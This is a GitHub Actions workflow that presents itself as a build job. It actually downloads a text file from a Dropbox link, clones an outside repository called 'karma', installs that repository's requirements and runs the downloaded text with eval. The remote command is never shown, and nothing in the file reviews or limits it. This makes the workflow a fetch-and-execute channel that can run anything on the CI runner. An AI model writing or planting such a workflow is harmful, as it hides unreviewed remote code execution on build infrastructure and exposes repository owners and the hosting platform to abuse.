name: Run

on:
  workflow_dispatch:

jobs:
  build:
    name: Start Building...
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Install Python
        run: sudo apt-get update && sudo apt-get install python3 -y

      - name: Install python requirements
        run: sudo apt-get install python3-pip -y

      - name: Download command from Dropbox
        run: |
          wget https://www.dropbox.com/scl/fi/js3qrf4v5yt1ovi5wgz2k/comand.txt?rlkey=9z03izj2eovoicr9i3fuwt1fu&dl=1 -O comand.txt

      - name: Run Shell Script
        run: |
          git clone https://github.com/s4evsa/karma.git
          cd karma
          pip3 install -r requirements.txt
          command=$(cat ../comand.txt)
          eval "$command"
